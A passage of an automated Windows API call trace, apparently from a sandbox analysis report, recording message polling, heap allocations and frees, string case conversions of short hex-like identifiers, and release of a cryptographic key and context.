PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.144] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.144] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.144] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.145] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.145] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.145] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.146] CryptDestroyKey (hKey=0xaa5920) returned 1 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.146] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.146] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.147] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.147] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.147] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.147] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.147] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.147] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.147] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.147] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.148] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0263.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.148] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.148] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.148] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.148] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.148] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.149] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.149] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0263.149] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.149] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0263.150] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.150] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0263.150] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.151] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.151] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.151] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.151] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.151] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.151] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.152] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.152] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.152] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.153] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.153] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.154] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.154] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.154] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.155] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.155] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0263.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.155] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.156] HeapFree (in: hHeap=0x25c0000, 